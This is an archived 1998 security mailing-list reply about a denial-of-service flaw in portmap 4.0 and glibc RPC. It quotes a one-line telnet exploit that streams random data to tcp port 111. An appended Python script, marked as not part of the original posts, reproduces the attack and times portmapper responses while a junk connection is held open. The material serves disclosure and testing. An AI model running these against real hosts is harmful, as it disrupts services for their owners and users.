Re: portmap 4.0-8 DoS

From: Peter van Dijk (peterat_private)
Date: Tue Apr 07 1998 - 13:17:58 PDT

    On Wed, 1 Apr 1998, Michal Zalewski wrote:
    
    > It's possible to perform a DoS attack by sending a small amount of junk to
    > tcp port 111 of a machine running portmap 4.0 (and older). A simple exploit
    > follows (it only sends a few random 8-bit chars):
    >
    >   telnet -E victim.com 111 </dev/random
    >
    > It will affect specific operations/services on the attacked host, like login -
    > depending on system speed, a login attempt on an idle machine (LA=0.01, Linux
    > 2.0.x, x86) will take from over 10 seconds (k6/200MHz) to long minutes
    > (486dx/80MHz). During the attack, many select() calls will fail (timeout),
    > so complex programs will become much slower (especially when resolving
    > domain names :), but LA will not change significantly.
    >
    > Smarter attacks (without /dev/random) are probably much more effective.
    
    This is the very same bug I already reported as 'easy DoS in most RPC
    apps'. rpc.portmap is one I forgot to check ;)
    This bug is in (g)libc; I've been discussing it with some rpc developers,
    and they don't see any simple solution...
    
    Greetz, Peter.
    
    ------------------------------------------------------------------------------
     'Selfishness and separation have led me to   .      Peter 'Hardbeat' van Dijk
      to believe that the world is not my problem .    network security consultant
      I am the world. And you are the world.'     .               (yeah, right...)
              Live - 10.000 years (peace is now)  .        peterat_private
    ------------------------------------------------------------------------------
     10:16pm  up 13 days, 19:56,  3 users,  load average: 1.02, 0.52, 0.20
    ------------------------------------------------------------------------------
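    The measurement the thread is built on (a junk stream at tcp/111, then see how
    long legitimate work takes) written out as a small check, added here as an
    example; it is not part of the original posts and not portmap or glibc code.
    It builds a PMAPPROC_NULL call (program 100000, version 2, procedure 0, AUTH_NULL)
    with the standard TCP record-marking header, times a round trip to the
    portmapper, then holds a second connection open after sending random bytes,
    as the quoted telnet line does, and times the NULL call again. The host
    name, byte count, timeout and the reply-parsing helper names are assumptions.

```python
import os
import socket
import struct
import sys
import time

# Portmapper constants (RFC 1057 / RFC 1833): program 100000, version 2,
# procedure 0 is PMAPPROC_NULL, which any live portmapper must answer.
PMAP_PROG = 100000
PMAP_VERS = 2
PMAPPROC_NULL = 0
CALL, REPLY = 0, 1
MSG_ACCEPTED = 0
SUCCESS = 0
LAST_FRAGMENT = 0x80000000      # high bit of the 4-byte record-marking header


def build_null_call(xid):
    """RPC v2 CALL body for PMAPPROC_NULL with AUTH_NULL cred and verf."""
    hdr = struct.pack(">IIIIII", xid, CALL, 2, PMAP_PROG, PMAP_VERS, PMAPPROC_NULL)
    auth = struct.pack(">IIII", 0, 0, 0, 0)   # cred flavor/len, verf flavor/len
    return hdr + auth


def frame_record(body):
    """Prefix the TCP record mark: last-fragment bit plus 31-bit length."""
    return struct.pack(">I", LAST_FRAGMENT | len(body)) + body


def parse_record_mark(header):
    """Decode a 4-byte record mark into (is_last_fragment, fragment_length).
    Any 4 junk bytes also decode this way, as a fragment of up to 2**31-1 bytes
    that the reader will then wait for."""
    (word,) = struct.unpack(">I", header[:4])
    return bool(word & LAST_FRAGMENT), word & 0x7FFFFFFF


def parse_null_reply(data, xid):
    """True if data is an accepted, successful REPLY matching xid (assumed helper)."""
    if len(data) < 24:
        return False
    rxid, mtype, reply_stat = struct.unpack(">III", data[:12])
    if rxid != xid or mtype != REPLY or reply_stat != MSG_ACCEPTED:
        return False
    _verf_flavor, verf_len = struct.unpack(">II", data[12:20])
    off = 20 + ((verf_len + 3) & ~3)            # verifier body is XDR-padded to 4
    if len(data) < off + 4:
        return False
    (accept_stat,) = struct.unpack(">I", data[off:off + 4])
    return accept_stat == SUCCESS


def recv_exact(sock, n):
    buf = b""
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:
            raise ConnectionError("peer closed")
        buf += chunk
    return buf


def recv_record(sock):
    """Reassemble one record-marked RPC message (may span fragments)."""
    out = b""
    while True:
        last, length = parse_record_mark(recv_exact(sock, 4))
        out += recv_exact(sock, length)
        if last:
            return out


def time_null_call(host, port=111, timeout=30.0):
    """Round-trip time of one PMAPPROC_NULL over TCP, and whether it succeeded."""
    xid = int.from_bytes(os.urandom(4), "big")
    t0 = time.monotonic()
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(frame_record(build_null_call(xid)))
        ok = parse_null_reply(recv_record(s), xid)
    return time.monotonic() - t0, ok


def hold_junk_connection(host, port=111, nbytes=64):
    """The post's test: random bytes at tcp/111, socket kept open (byte count assumed)."""
    s = socket.create_connection((host, port), timeout=30.0)
    s.sendall(os.urandom(nbytes))
    return s


def run_check(host):
    """Baseline NULL call, then the same call while a junk connection is held."""
    base = time_null_call(host)
    junk = hold_junk_connection(host)
    try:
        stalled = time_null_call(host)
    except (socket.timeout, ConnectionError) as e:
        stalled = (None, repr(e))
    finally:
        junk.close()
    return {"baseline": base, "during_junk": stalled}


if __name__ == "__main__":
    print(run_check(sys.argv[1] if len(sys.argv) > 1 else "victim.example"))
```

    A baseline of a few milliseconds followed by a stalled or timed-out call
    during the junk connection is the behaviour the thread describes; a second
    call that completes normally means the portmapper on that host does not share
    the blocking behaviour reported here.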
    



    This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 13:48:16 PDT